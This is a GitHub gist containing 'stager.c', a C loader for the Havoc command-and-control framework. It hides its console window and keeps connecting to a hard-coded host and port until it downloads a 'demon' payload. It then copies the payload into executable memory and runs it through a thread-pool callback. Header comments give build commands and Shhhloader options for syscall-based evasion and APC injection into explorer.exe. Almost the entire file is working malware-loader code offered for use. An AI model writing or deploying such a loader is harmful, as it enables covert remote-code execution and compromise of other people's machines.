Created
August 2, 2023 16:33
-
-
Save p4p1/b2e829a9e75c344e055584ae8ffc29bd to your computer and use it in GitHub Desktop.
ππππ
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
** p4p1: http://p4p1.github.io/ | |
** Created on: Wed 02 Aug 2023 01:37:50 PM CEST | |
** stager.c | |
** Description: | |
** A C stager for havoc. | |
** Commands for things: | |
** ./Shhhloader.py -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin | |
** ./Shhhloader.py -v -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin | |
** x86_64-w64-mingw32-gcc net_stager.c -o hidden2.exe -lws2_32 | |
*/ | |
#include <ws2tcpip.h> | |
#include <winsock2.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <stdio.h> | |
#pragma comment(lib,"ws2_32.lib") | |
#define IP_ADDR "192.168.1.104" | |
#define PORT 1234 | |
#ifdef _32_BIT_ | |
#define demon_x64_bin_len 89088 | |
#else | |
#define demon_x64_bin_len 97279 | |
#endif | |
unsigned char data[demon_x64_bin_len]; | |
int retrieve_stager() | |
{ | |
WSADATA wsa; | |
SOCKET s; | |
struct sockaddr_in cleanServer; | |
int response_size = 0; | |
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) | |
return 2; | |
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) | |
return 2; | |
InetPtonA(AF_INET, IP_ADDR, &cleanServer.sin_addr.s_addr); | |
cleanServer.sin_family = AF_INET; | |
cleanServer.sin_port = htons(PORT); | |
if (connect(s, (struct sockaddr*)&cleanServer, sizeof(cleanServer)) < 0) | |
return 2; | |
if ((response_size = recv(s, (char*)data, demon_x64_bin_len, 0)) == SOCKET_ERROR) | |
return 2; | |
closesocket(s); | |
return 1; | |
} | |
int main(void) | |
{ | |
PVOID alloc; | |
DWORD oldProtect = 0; | |
HANDLE cr; | |
HANDLE hProcess; | |
int ret_val = 2; | |
HWND stealth; | |
AllocConsole(); | |
stealth=FindWindowA("ConsoleWindowClass", NULL); | |
ShowWindow(stealth, 0); | |
while (ret_val == 2) // constantly download stager on error; | |
ret_val = retrieve_stager(); | |
HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); | |
LPVOID scodeAddress = VirtualAlloc(NULL, sizeof(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
RtlMoveMemory(scodeAddress, data, sizeof(data)); | |
PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)scodeAddress, NULL, NULL); | |
SetThreadpoolWait(threadPoolWait, event, NULL); | |
WaitForSingleObject(event, INFINITE); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment